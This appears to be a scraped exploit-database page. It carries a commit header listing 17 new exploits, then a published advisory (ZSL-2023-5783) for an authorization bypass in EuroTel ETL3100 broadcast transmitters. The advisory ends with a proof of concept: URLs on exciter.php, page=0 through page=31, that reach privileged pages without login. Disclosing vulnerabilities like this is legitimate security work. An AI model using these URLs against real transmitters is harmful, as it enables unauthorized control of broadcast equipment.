e07f33f24d
17 changes to exploits/shellcodes/ghdb EuroTel ETL3100 - Transmitter Authorization Bypass (IDOR) EuroTel ETL3100 - Transmitter Default Credentials EuroTel ETL3100 - Transmitter Unauthenticated Config/Log Download Color Prediction Game v1.0 - SQL Injection Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated) Dolibarr Version 17.0.1 - Stored XSS Global - Multi School Management System Express v1.0- SQL Injection OVOO Movie Portal CMS v3.3.3 - SQL Injection PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities Taskhub CRM Tool 2.8.6 - SQL Injection Inosoft VisiWin 7 2022-2.1 - Insecure Folders Permissions TSPlus 16.0.0.0 - Remote Work Insecure Credential storage TSplus 16.0.0.0 - Remote Work Insecure Files and Folders TSplus 16.0.2.14 - Remote Access Insecure Files and Folders Permissions Linux/x64 - memfd_create ELF loader Shellcode (170 bytes)
54 lines
No EOL
1.8 KiB
Text
54 lines
No EOL
1.8 KiB
Text
# Exploit Title: EuroTel ETL3100 - Transmitter Authorization Bypass (IDOR)
|
|
# Exploit Author: LiquidWorm
|
|
|
|
Vendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.L
|
|
Product web page: https://www.eurotel.it | https://www.siel.fm
|
|
Affected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter)
|
|
v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)
|
|
|
|
|
|
Summary: RF Technology For Television Broadcasting Applications.
|
|
The Series ETL3100 Radio Transmitter provides all the necessary
|
|
features defined by the FM and DAB standards. Two bands are provided
|
|
to easily complain with analog and digital DAB standard. The Series
|
|
ETL3100 Television Transmitter provides all the necessary features
|
|
defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as
|
|
well as the analog TV standards. Three band are provided to easily
|
|
complain with all standard channels, and switch softly from analog-TV
|
|
'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.
|
|
|
|
Desc: The application is vulnerable to insecure direct object references
|
|
that occur when the application provides direct access to objects based
|
|
on user-supplied input. As a result of this vulnerability attackers can
|
|
bypass authorization and access the hidden resources on the system and
|
|
execute privileged functionalities.
|
|
|
|
Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)
|
|
lighttpd/1.4.26
|
|
PHP/5.4.3
|
|
Xilinx Virtex Machine
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2023-5783
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5783.php
|
|
|
|
|
|
29.04.2023
|
|
|
|
--
|
|
|
|
|
|
See URL:
|
|
|
|
TARGET/exciter.php?page=0
|
|
TARGET/exciter.php?page=1
|
|
TARGET/exciter.php?page=2
|
|
...
|
|
...
|
|
TARGET/exciter.php?page=29
|
|
TARGET/exciter.php?page=30
|
|
TARGET/exciter.php?page=31 |